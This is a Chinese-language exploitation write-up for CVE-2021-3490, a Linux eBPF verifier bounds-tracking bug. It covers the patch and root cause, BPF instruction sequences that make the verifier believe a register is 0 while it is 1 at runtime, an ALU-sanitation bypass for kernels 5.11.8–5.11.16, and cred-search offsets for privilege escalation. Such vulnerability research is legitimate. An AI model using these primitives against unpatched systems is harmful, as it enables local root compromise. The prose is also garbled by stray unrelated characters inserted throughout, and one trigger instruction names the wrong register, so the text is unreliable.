文章首發(fā)于安全客:CVE-2021-3490 eBPF 32位邊界計算錯誤漏洞利用分析
影響版本:Linux 5.7-rc1以后,Linux 5.13-rc4 以前; v5.13-rc4已修補,v5.13-rc3未修補输虱。 評分7.8分予权。
測試版本:Linux-5.11 和 Linux-5.11.16 exploit及測試環(huán)境下載地址—https://github.com/bsauce/kernel-exploit-factory
編譯選項:CONFIG_BPF_SYSCALL
昂勉,config所有帶BPF字樣的。 CONFIG_SLAB=y
General setup
---> Choose SLAB allocator (SLUB (Unqueued Allocator))
---> SLAB
在編譯時將.config
中的CONFIG_E1000
和CONFIG_E1000E
扫腺,變更為=y岗照。參考
$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-5.11.16.tar.xz
$ tar -xvf linux-5.11.16.tar.xz
# KASAN: 設(shè)置 make menuconfig 設(shè)置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。
$ make -j32
$ make all
$ make modules
# 編譯出的bzImage目錄:/arch/x86/boot/bzImage笆环。
漏洞描述:Linux內(nèi)核中按位操作(AND攒至、OR 和 XOR)的 eBPF ALU32 邊界跟蹤沒有正確更新 32 位邊界,造成 Linux 內(nèi)核中的越界讀取和寫入躁劣,從而導(dǎo)致任意代碼執(zhí)行迫吐。三個漏洞函數(shù)分別是 scalar32_min_max_and() 、scalar32_min_max_or()账忘、scalar32_min_max_xor()志膀。AND/OR
是在 Linux 5.7-rc1 中引入,XOR
是在 Linux 5.10-rc1中引入鳖擒。
補丁:patch 若低32位都為 known溉浙,則調(diào)用 __mark_reg32_known(),將32位邊界設(shè)置為reg的低32位(常數(shù))蒋荚,保證最后更新邊界時戳稽,有正確的邊界。
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 757476c91c984..9352a1b7de2dd 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -7084,11 +7084,10 @@ static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
s32 smin_val = src_reg->s32_min_value;
u32 umax_val = src_reg->u32_max_value;
- /* Assuming scalar64_min_max_and will be called so its safe
- * to skip updating register for known 32-bit case.
- */
- if (src_known && dst_known)
+ if (src_known && dst_known) {
+ __mark_reg32_known(dst_reg, var32_off.value);
return;
+ }
/* We get our minimum from the var_off, since that's inherently
* bitwise. Our maximum is the minimum of the operands' maxima.
@@ -7108,7 +7107,6 @@ static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
dst_reg->s32_min_value = dst_reg->u32_min_value;
dst_reg->s32_max_value = dst_reg->u32_max_value;
}
-
}*/
static void __mark_reg32_known(struct bpf_reg_state *reg, u64 imm)
{
reg->var_off = tnum_const_subreg(reg->var_off, imm);
reg->s32_min_value = (s32)imm;
reg->s32_max_value = (s32)imm;
reg->u32_min_value = (u32)imm;
reg->u32_max_value = (u32)imm;
}
保護機制:開啟KASLR/SMEP/SMAP圆裕。
利用總結(jié):利用verifier階段與runtime執(zhí)行階段的不一致性广鳍,進行越界讀寫。泄露內(nèi)核基址吓妆、偽造函數(shù)表、實現(xiàn)任意讀寫后篡改本線程的cred吨铸。
1. 漏洞分析
參考:BPF介紹和相似漏洞分析行拢,可參考CVE-2020-8835利用,里面也有var_off
也即tnum
結(jié)構(gòu)的含義诞吱≈鄣欤總之,其成員 value
表示確定的值房维,mask
對應(yīng)的位是1則表示該位不確定沼瘫。
漏洞根源:eBPF指令集可以對64位寄存器或低32位進行操作,verifier
也會對低32位進行范圍追蹤:{u,s}32_{min,max}_value
咙俩。每次進行指令操作耿戚,有兩個函數(shù)會分別更新64位和32位的邊界湿故,在 adjust_scalar_min_max_vals() 中調(diào)用這兩個函數(shù)。很多BPF漏洞都出現(xiàn)在對32位邊界的處理上膜蛔。CVE-2021-3490也出現(xiàn)在32位運算 BPF_AND
坛猪、BPF_OR
、BPF_XOR
中皂股。
1-1 代碼跟蹤
漏洞調(diào)用鏈:adjust_scalar_min_max_vals() -> scalar32_min_max_and()
*
/* WARNING: This function does calculations on 64-bit values, but * the actual execution may occur on 32-bit values. Therefore, * things like bitshifts need extra checks in the 32-bit case.
*/
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
struct bpf_insn *insn,
struct bpf_reg_state
*dst_reg,
struct bpf_reg_state src_reg)
{
...
case BPF_AND:
dst_reg->var_off = tnum_and(dst_reg->var_off,
src_reg.var_off);
scalar32_min_max_and(dst_reg, &src_reg); // [1] <--- 漏洞點
scalar_min_max_and(dst_reg, &src_reg);
break;
case BPF_OR:
dst_reg->var_off = tnum_or(dst_reg->var_off,
src_reg.var_off);
scalar32_min_max_or(dst_reg, &src_reg); // <--- 漏洞點
scalar_min_max_or(dst_reg, &src_reg);
break;
case BPF_XOR:
dst_reg->var_off = tnum_xor(dst_reg->var_off,
src_reg.var_off);
scalar32_min_max_xor(dst_reg, &src_reg); // <--- 漏洞點
scalar_min_max_xor(dst_reg, &src_reg);
break;
...
__update_reg_bounds(dst_reg); // [2]
__reg_deduce_bounds(dst_reg);
__reg_bound_offset(dst_reg);
return 0;
}
[1]
: 對比32位和64位的BPF_AND
操作墅茉。低32位 BPF_AND
中,若 src_reg
和 dst_reg
都為 known呜呐,則不用更新32位的邊界(開發(fā)者假設(shè)就斤,反正之后還是會調(diào)用 scalar_min_max_and() -> __mark_reg_known() 來標記寄存器的,所以暫時不用處理)蘑辑,直接返回洋机。64位 BPF_AND
中,若 src_reg
和 dst_reg
都為 known以躯,則調(diào)用 __mark_reg_known() 將寄存器標記為 known槐秧。
問題:scalar32_min_max_and() 32位中,*_known
變量是調(diào)用 tnum_subreg_is_const() 來計算的忧设,而 scalar_min_max_and() 64位中是調(diào)用 tnum_is_const() 來計算的刁标。區(qū)別是,前者只判斷低32位的 tnum->mask
來判斷是否為 known址晕,后者則判斷整個64位是否為 known膀懈。如果某個寄存器的高32位不確定,而低32位是確定的谨垃,則 scalar_min_max_and() 也不會調(diào)用 __mark_reg_known() 來標記寄存器启搂。
static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
bool src_known = tnum_subreg_is_const(src_reg->var_off);
bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
struct tnum var32_off = tnum_subreg(dst_reg->var_off);
s32 smin_val = src_reg->s32_min_value;
u32 umax_val = src_reg->u32_max_value;
/* Assuming scalar64_min_max_and will be called so its safe
* to skip updating register for known 32-bit case. 開發(fā)者假設(shè),反正之后還是會調(diào)用scalar_min_max_and() -> __mark_reg_known() 來標記寄存器的刘陶,所以暫時不用處理胳赌,直接返回。但是如果某個寄存器的高32位不確定匙隔,而低32位是確定的疑苫,則 scalar_min_max_and() 不會調(diào)用 __mark_reg_known()。
*/
if (src_known && dst_known)
return;
...
}
static void scalar_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
bool src_known = tnum_is_const(src_reg->var_off);
bool dst_known = tnum_is_const(dst_reg->var_off);
s64 smin_val = src_reg->smin_value;
u64 umin_val = src_reg->umin_value;
if (src_known && dst_known) {
__mark_reg_known(dst_reg, dst_reg->var_off.value);
return;
}
...
}
[2]
:接著 adjust_scalar_min_max_vals() 會調(diào)用以下三個函數(shù)來更新 dst_reg
寄存器的邊界纷责。每個函數(shù)都包含32位和64位的處理部分捍掺,我們這里只關(guān)心32位的處理部分。reg 的邊界是根據(jù)當前邊界和 reg->var_off
來計算的再膳。
// __update_reg32_bounds() —— min邊界是取 min{當前min邊界挺勿、reg確定的值},會變大喂柒;max邊界是取 max{當前max邊界不瓶,reg確定的值}禾嫉,會變小。
static void __update_reg32_bounds(struct bpf_reg_state *reg)
{
struct tnum var32_off = tnum_subreg(reg->var_off);
/* min signed is max(sign bit) | min(other bits) */
reg->s32_min_value = max_t(s32, reg->s32_min_value,
var32_off.value | (var32_off.mask &
S32_MIN));
/* max signed is min(sign bit) | max(other bits) */
reg->s32_max_value = min_t(s32, reg->s32_max_value,
var32_off.value | (var32_off.mask &
S32_MAX));
reg->u32_min_value = max_t(u32, reg->u32_min_value,
(u32)var32_off.value);
reg->u32_max_value = min(reg->u32_max_value,
(u32)(var32_off.value |
var32_off.mask));
}
// __reg32_deduce_bounds() —— 接著用符號和無符號邊界來互相更新
/* Uses signed min/max values to inform unsigned, and vice-versa */
static void __reg32_deduce_bounds(struct bpf_reg_state *reg)
{
/* Learn sign from signed bounds.
* If we cannot cross the sign boundary, then signed and
* unsigned bounds
* are the same, so combine. This works even in the
* negative case, e.g.
* -3 s<= x s<= -1 implies 0xf...fd u<= x u<= 0xf...ff.
*/
if (reg->s32_min_value >= 0 || reg->s32_max_value < 0) {
reg->s32_min_value = reg->u32_min_value =
max_t(u32, reg->s32_min_value,
reg->u32_min_value);
reg->s32_max_value = reg->u32_max_value =
min_t(u32, reg->s32_max_value,
reg->u32_max_value);
return;
}
...
}
// __reg_bound_offset() —— 最后湃番,用無符號邊界來更新 var_off
static void __reg_bound_offset(struct bpf_reg_state *reg)
{
struct tnum var64_off = tnum_intersect(reg->var_off, // tnum_intersect() —— 組合兩個tnum參數(shù)
tnum_range(reg->umin_value, // tnum_range() —— 返回一個tnum夭织,表示給定范圍內(nèi),所有可能的值吠撮。
reg->umax_value));
struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),tnum_range(reg->u32_min_value, reg->u32_max_value));
reg->var_off = tnum_or(tnum_clear_subreg(var64_off),
var32_off);
}
1-2 觸發(fā)漏洞
BPF代碼示例:例如指令BPF_ALU64_REG(BPF_AND, R2, R3)
尊惰,對 R2 和 R3 進行與操作,并保存到 R2泥兰。
-
R2->var_off = {mask = 0xFFFFFFFF00000000; value = 0x1}
弄屡,表示R2低32位已知為1,高32位未知鞋诗。由于低32位已知膀捷,所以其32位邊界也為1。 -
R3->var_off = {mask = 0x0; value = 0x100000002}
削彬,表示其整個64位都已知全庸,為0x100000002
。
更新R2的32位邊界的步驟如下:
-
先調(diào)用 adjust_scalar_min_max_vals() -> tnum_and() 對
R2->var_off
和R3->var_off
進行AND操作融痛,并保存到R2->var_off
壶笼。結(jié)果R2->var_off = {mask = 0x100000000; value = 0x0}
,由于R3是確定的且R2高32位不確定雁刷,所以運算后覆劈,只有第32位是不確定的。struct tnum tnum_and(struct tnum a, struct tnum b) { u64 alpha, beta, v; alpha = a.value | a.mask; beta = b.value | b.mask; v = a.value & b.value; return TNUM(v, alpha & beta & ~v); }
再調(diào)用 adjust_scalar_min_max_vals() -> scalar32_min_max_and()沛励,會直接返回责语,因為R2和R3的低32位都已知。
再調(diào)用 adjust_scalar_min_max_vals() -> __update_reg_bounds() -> __update_reg32_bounds() 目派,會設(shè)置
u32_max_value = 0
坤候,因為var_off.value = 0 < u32_max_value = 1
。同時企蹭,設(shè)置u32_min_value = 1
铐拐,因為var_off.value = 0 < u32_min_value
。帶符號邊界也一樣练对。__reg32_deduce_bounds() 和 __reg_bound_offset() 對邊界不作任何改變。最后得到寄存器 R2 —
{u,s}32_max_value = 0 < {u,s}32_min_value = 1
吹害。
1-3 調(diào)試BPF的方法
寫和調(diào)試BPF程序:可使用rbpf螟凭。
verifier 日志輸出:加載BPF程序時進行如下設(shè)置,即可在verifier
檢測出指令錯誤時輸出指令信息它呀。正常調(diào)試時螺男,可以下源碼斷點棒厘,斷在do_check()
函數(shù)中,具體觀察 verifier
檢查每條指令時寄存器的狀態(tài)下隧。
char verifier_log_buff[0x200000] = {0}; // 這段緩沖區(qū)必須足夠大奢人,否則會出錯
union bpf_attr prog_attrs =
{
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
.insn_cnt = cnt,
.insns = (uint64_t)insn,
.license = (uint64_t)"",
.log_level = 2, // 設(shè)置為 1 時,就能輸出簡潔的指令信息
.log_size = sizeof(verifier_log_buff),
.log_buf = verifier_log_buff
};
// 輸出示例
34: (bf) r6 = r3
35: R0_w=invP0 R2_w=map_value(id=0,off=0,ks=4,vs=4919,imm=0) R3_w=map_value(id=0,off=0,ks=4,vs=4919,imm=0) R4_w=invP0 R5_w=invP4294967298 R6_w=map_value(id=0,off=0,ks=4,vs=4919,imm=0) R7_w=invP(id=0) R10=fp0 fp-8=mmmm????
35: (7b) *(u64 *)(r2 +8) = r6
R6 leaks addr into map
runtime調(diào)試:如果BPF通過了verifier
檢查淆院,如何獲取BPF程序運行時的信息呢何乎?答案是插樁。ALU Sanitation
也是運行時檢查指令執(zhí)行情況的保護機制土辩,可以通過插樁觀察BPF指令是否已經(jīng)改變支救。這里需要了解一個編譯選項,編譯時設(shè)置CONFIG_BPF_JIT
拷淘,則BPF程序在verifier驗證后是JIT及時編譯的各墨;如果不設(shè)置該選項,則采用eBPF解釋器來解碼并執(zhí)行BPF程序启涯,代碼位于kernel/bpf/core.c:___bpf_prog_run()
贬堵。
regs
指向寄存器值,insn
指向指令结洼。為了獲取每條指令執(zhí)行時的寄存器狀態(tài)黎做,可以關(guān)閉CONFIG_BPF_JIT
選項并插入printk
語句。示例如下:
static u64 ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn)
{
...
int lol = 0;
// Check the first instruction to match the first instruction of
// the target eBPF program to debug, so output isn't printed for
// every eBPF program that is ran. 只打印部分指令的信息
if(insn->code == 0xb7)
{
lol = 1;
}
select_insn:
if(lol)
{
printk("instruction is: %0x\n", insn->code);
printk("r0: %llx, r1: %llx, r2: %llx\n", regs[0],
regs[1], regs[2]);
...
}
goto *jumptable[insn->code];
...
}
2. 漏洞利用 Linux v5.11.7 及以前版本
特點:我們采用Linux v5.11
版本的內(nèi)核進行測試补君,特點是不需要繞過一種ALU Sanitation引几,之后我們會詳細介紹。
總目標:構(gòu)造 r6
寄存器挽铁,使得 verifier
認為 r6
等于0伟桅,但實際執(zhí)行時等于1。
2-1 觸發(fā)漏洞
首先叽掘,我們需要構(gòu)造出兩個寄存器的值狀態(tài)楣铁,分別為var_off = {mask = 0xFFFFFFFF00000000; value = 0x1}
和 var_off = {mask = 0x0; value = 0x100000002}
。然后觸發(fā)漏洞更扁,得到 r6
的 u32_max_value = 0 < u32_min_value = 1
盖腕。
注意:實際從map傳入的 r5 = r6 = 0
。
// (1) 構(gòu)造 r6: var_off = {mask = 0xFFFFFFFF00000000; value = 0x1}
BPF_MAP_GET(0, BPF_REG_5), // (79) r5 = *(u64 *)(r0 +0) 從MAP傳入值浓镜,這樣其 mask=0xffffffffffffffff
BPF_MOV64_REG(BPF_REG_6, BPF_REG_5), // (bf) r6 = r5
BPF_LD_IMM64(BPF_REG_2, 0xFFFFFFFF), // (18) r2 = 0xffffffff
BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // (67) r2 <<= 32 0xFFFFFFFF00000000
BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_2), // (5f) r6 &= r2 高32位unknown, 低32位known為0
BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1), // (07) r6 += 1 {mask = 0xFFFFFFFF00000000, value = 0x1}
// (2) 構(gòu)造 r2: var_off = {mask = 0x0; value = 0x100000002}
BPF_LD_IMM64(BPF_REG_2, 0x1), // (18) r2 = 0x1
BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // (67) r2 <<= 32 0x10000 0000
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 2), // (07) r2 += 2 {mask = 0x0; value = 0x100000002}
// (3) trigger the vulnerability
BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_8), // (5f) r6 &= r2 r6: u32_min_value=1, u32_max_value=0
2-2 構(gòu)造 verifier:0 tuntime:1
// (4) 構(gòu)造 r5 (r5也是MAP載入的值——0): u32_min_value = 0, u32_max_value = 1, var_off = {mask = 0xFFFFFFFF00000001; value = 0x0}
BPF_JMP32_IMM(BPF_JLE, BPF_REG_5, 1, 1), // (b6) if w5 <= 0x1 goto pc+1 r5: u32_min_value = 0, u32_max_value = 1, var_off = {mask = 0xFFFFFFFF00000001; value = 0x0}
BPF_EXIT_INSN(),
// (5) 構(gòu)造 r6: verifier:0 tuntime:1
BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1), // (07) r6 += 1 r6: u32_max_value = 1, u32_min_value = 2, var_off = {0x100000000; value = 0x1}
BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_5), // (0f) r6 += r5 r6: verify:2 fact:1 !!!!!!!!!!!!!!!!!!!!!!!
BPF_MOV32_REG(BPF_REG_6, BPF_REG_6), // (bc) w6 = w6 32位擴展為64位
BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 1), // (57) r6 &= 1 r6: verify:0 fact:1
r6 += r5分析:目前寄存器狀態(tài)溃列,r6—u32_min_value=2, u32_max_value=1, var_off = {mask = 0x100000000; value = 0x1}
,r5—u32_min_value=0, u32_max_value=1, var_off = {mask = 0xFFFFFFFF00000001; value = 0x0}
膛薛。
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
struct bpf_insn *insn,
struct bpf_reg_state
*dst_reg,
struct bpf_reg_state src_reg)
{
...
switch (opcode) {
case BPF_ADD:
scalar32_min_max_add(dst_reg, &src_reg); // [1] <---------
scalar_min_max_add(dst_reg, &src_reg);
dst_reg->var_off = tnum_add(dst_reg->var_off,
src_reg.var_off);
break;
...
__update_reg_bounds(dst_reg); // [2]
__reg_deduce_bounds(dst_reg); // [3]
__reg_bound_offset(dst_reg); // [4]
return 0;
}
// [1] 由于r5的低32位是0或1听隐,r6的低32位是1,所以相加結(jié)果為1或2哄啄,所以低32位的1雅任、2位都為unknown风范。其mask=0xffffffff 00000003
static void scalar32_min_max_add(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
s32 smin_val = src_reg->s32_min_value;
s32 smax_val = src_reg->s32_max_value;
u32 umin_val = src_reg->u32_min_value;
u32 umax_val = src_reg->u32_max_value;
...
if (dst_reg->u32_min_value + umin_val < umin_val ||
dst_reg->u32_max_value + umax_val < umax_val) { // 判斷是否越界
dst_reg->u32_min_value = 0;
dst_reg->u32_max_value = U32_MAX;
} else {
dst_reg->u32_min_value += umin_val; // 沒越界則直接相加,min+min, max+max
dst_reg->u32_max_value += umax_val;
}
}
接著 adjust_scalar_min_max_vals()
會調(diào)用 __update_reg_bounds()
沪么、__reg_deduce_bounds()
硼婿、__reg_bound_offset()
。
-
__update_reg32_bounds()
中禽车,var_off
表示低32位寇漫,reg->u32_min_value = max{2, 0} = 2
,reg->u32_max_value = min{2, 0 | 0x3} = 2
(var32_off.mask = 3
)哭当。 -
__reg32_deduce_bounds()
未做修改猪腕,因為signed 32
和unsigned 32
都相等。 -
__reg32_deduce_bounds()
中钦勘,tnum_range()
返回常數(shù)2(因為u32_min_value = u32_max_value=2
該范圍內(nèi)只有2)陋葡,由于reg->var_off.mask = 0x3
,所以tnum_intersect()
返回低2位是 known且為2彻采。
最終得到 r6: {u,s}32_min_value = {u,s}32_max_value = 2, var_off = {mask = 0xFFFFFFFF00000000; value = 0x2}
腐缤。
// [2] __update_reg32_bounds()
reg->u32_min_value = max_t(u32, reg->u32_min_value,
(u32)var32_off.value);
reg->u32_max_value = min(reg->u32_max_value,
(u32)(var32_off.value | var32_off.mask)); // var32_off.mask=0x3
// [4] __reg32_deduce_bounds()
struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off), // tnum_subreg取低32位
tnum_range(reg->u32_min_value, // 根據(jù)min、max返回一個tnum結(jié)構(gòu)
reg->u32_max_value));
struct tnum tnum_intersect(struct tnum a, struct tnum b)
{
u64 v, mu;
v = a.value | b.value; // 簡單的整合
mu = a.mask & b.mask;
return TNUM(v & ~mu, mu);
}
此時的 r6—{mask = 0xFFFFFFFF00000000; value = 0x2} verifier:2 runtime:1
肛响,只需取低32位并 AND 1
岭粤,即可得到 verifier:0 runtime:1
。
2-3 提權(quán)
后面的利用步驟和CVE-2021-31440一樣特笋,參照 CVE-2021-31440 eBPF邊界計算錯誤漏洞 的exp即可提權(quán)剃浇。
3. 漏洞利用 Linux v5.11.8 - 5.11.16 版本
特點:我們采用 Linux v5.11.16
版本的內(nèi)核進行測試,Ubuntu 21.04就是這個版本猎物。2021年3月修復(fù)了一個verifier
計算alu_limit
(與ALU Sanitation
安全機制有關(guān))時的整數(shù)溢出漏洞——commit 10d2bb2e6b1d8c虎囚,導(dǎo)致 Linux 5.11.8 - 5.11.16
這個版本區(qū)間的內(nèi)核無法利用成功。當alu_limit = 0
時會觸發(fā)該漏洞蔫磨,例如淘讥,當對map地址指針進行減法操作時(之前exp這么寫,是為了構(gòu)造越界訪問堤如,如泄露內(nèi)核基址蒲列,或者修改map內(nèi)存之前的 bpf_map
結(jié)構(gòu)),會加入如下sanitation指令:0-1
將得到 aux→alu_limit = 0xFFFFFFFF
搀罢。
*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1);
這個漏洞的存在蝗岖,導(dǎo)致ALU Sanitation
機制失效了,因為 alu_limit
變得很大了榔至,檢測不到越界訪問剪侮,所以之前那些公開的exp都能利用成功。但是這個漏洞被修復(fù)以后,就需要繞過這個限制瓣俯,需要多加5條指令來繞過該機制。
繞過該ALU Sanitation:r7
指向map兵怯,r6
是verifier
以為是0而運行時為1的那個值彩匕。需要在r7指針進行運算前,使alu_limit != 0
媒区。
- (1)
r8 = r6
先拷貝一下——r8 verifier:0 runtime:1
驼仪。 - (2)
r7 += 0x1000
,map指針加上一個常量袜漩,以設(shè)置alu_limit=0x1000
绪爸,這樣就能繞過運行時的ALU Sanitation
。 - (3)
r8 = r8 * 0xfff
——r8 verifier:0 runtime:0xfff
宙攻。 - (4)
r7 -= r8
奠货, 由于verifier
以為r8等于0,所以alu_limit
保持不變座掘。 - (5)
r7 -= r6
——r7 verifier:map+0x1000 runtime:map
递惋。
注意:
-
創(chuàng)建map時必須足夠大,調(diào)用
syscall(__NR_BPF, BPF_MAP_CREATE, ...)
時第3個參數(shù)bpf_attr->value_size
要大于0x1000溢陪,不然執(zhí)行第2條指令時就會報指針越界的錯誤萍虽。BPF_MOV64_REG(BPF_REG_8, BPF_REG_6), // 1-1. (bf) r8 = r6 BPF_REG_3 = BPF_REG_6 !!! 1-1 -> 1-5 是為了繞過alu_limit的限制 BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), // 1-2. (07) r7 += 0x1000 !!! 注意,map不能過小形真,小于0x1000 就報錯 BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0xfff), // 1-3. verifier: r8=0; runtime: r8=0x1000-1 BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), // 1-4. r7 -= r8 BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6), // 1-5. r7 -= r6
-
和
Linux v5.11
版本相比杉编,還需要修改cred search的相關(guān)偏移:gef? p/x &(*(struct task_struct *)0)->pid $9 = 0x918 gef? p/x &(*(struct task_struct *)0)->cred $10 = 0xad8 gef? p/x &(*(struct task_struct *)0)->tasks $11 = 0x818
4. 漏洞利用 Linux v5.11.16以后的版本
特點:目前無法繞過最新的ALU Sanitation
保護機制。2021年4月ALU Sanitation
引入新的 patch—commit 7fedb63a8307咆霜,新增了兩個特性邓馒。
一是
alu_limit
計算方法變了,不再用指針寄存器的位置來計算裕便,而是使用offset寄存器绒净。例如,假設(shè)有個寄存器的無符號邊界是umax_value = 1, umin_value = 0
偿衰,則計算出alu_limit = 1
挂疆,表示如果該寄存器在運行時超出邊界,則指針運算不會使用該寄存器下翎。-
二是在runtime時會用立即數(shù)替換掉
verifier
認定為常數(shù)的寄存器缤言。例如,BPF_ALU64_REG(BPF_ADD, BPF_REG_2, EXPLOIT_REG)
视事,EXPLOIT_REG
被verifier認定為0胆萧,但運行時為1,則 將該指令改為BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0)
。這個補丁本來是為了防側(cè)信道攻擊跌穗,同時也阻止了CVE-2021-3490
漏洞的利用订晌。// 以下補丁可看出,如果不確定offset寄存器是否為常量蚌吸,則根據(jù)其alu_limit進行檢查锈拨;如果確定其為常量,則用其常量值將其操作patch為立即數(shù)指令羹唠。 bool off_is_imm = tnum_is_const(off_reg->var_off); alu_state |= off_is_imm ? BPF_ALU_IMMEDIATE : 0; isimm = aux->alu_state & BPF_ALU_IMMEDIATE; ... if (isimm) { *patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit); } else { // Patch alu_limit check instructions .... }
檢查發(fā)現(xiàn)奕枢,v5.11.17 已打該補丁,v5.11.16 未打該補丁佩微。所以 v5.11.16 以上版本的內(nèi)核就無法利用漏洞進行越界讀寫缝彬,不知道以后能不能繞過這個限制。
5. ALU Sanitation機制
原理:ALU sanitation
機制一直在進行更新哺眯,其目的是為了阻止verifier
漏洞的利用谷浅,原理是在runtime運行時檢查BPF指令的操作數(shù),防止指針運算越界導(dǎo)致越界讀寫族购,其實是對verifier
靜態(tài)范圍檢查起到了補充的作用壳贪。
如果某條ALU運算指令的操作數(shù)是1個指針和1個標量,則計算alu_limit
也即最大絕對值寝杖,就是該指針可以進行加減的安全范圍违施。在該指令之前必須加上如下指令,off_reg
表示與指針作運算的標量寄存器瑟幕,BPF_REG_AX
是輔助寄存器磕蒲。
- (1)將
alu_limit
載入BPF_REG_AX
。 - (2)
BPF_REG_AX = alu_limit - off_reg
只盹,如果off_reg > alu_limit
辣往,則BPF_REG_AX
最高位符號位置位。 - (3)若
BPF_REG_AUX
為正殖卑,off_reg
為負站削,則表示alu_limit
和寄存器的值符號相反,則BPF_OR
操作會設(shè)置該符號位孵稽。 - (4)
BPF_NEG
會使符號位置反许起,1->0,0->1菩鲜。 - (5)
BPF_ARSH
算術(shù)右移63位园细,BPF_REG_AX
只剩符號位。 - (6)根據(jù)以上運算結(jié)果接校,
BPF_AND
要么清零off_reg
要么使其不變猛频。
總體看來,如果off_reg > alu_limit
或者二者符號相反,表示有可能發(fā)生指針越界鹿寻,則off_reg
會被替換為0睦柴,清空指針運算。反之烈和,如果標量在合理范圍內(nèi)—0 <= off_reg <= alu_limit
爱只,則算術(shù)移位會將BPF_REG_AX
填為1,這樣BPF_AND
運算不會改變該標量招刹。
*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit);
*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
*patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX, off_reg);
最近更新:最近更新了alu_limit
的計算方法,見commit 7fedb63a8307d窝趣,這里我們對比一下更新前后的計算差異疯暑。
- 之前:
alu_limit
由指針寄存器的邊界確定,如果指針指向map的開頭哑舒,則alu_limit
可減的大小為0妇拯,可加的大小為map size-1
,并且alu_limit
隨著接下來的指針運算而更新洗鸵。 - 現(xiàn)在:
alu_limit
由offset
寄存器的邊界來確定越锈,將運行時offset寄存器的值與verifier
靜態(tài)范圍追蹤時計算出來的邊界進行比較。
參考
Kernel Pwning with eBPF: a Love Story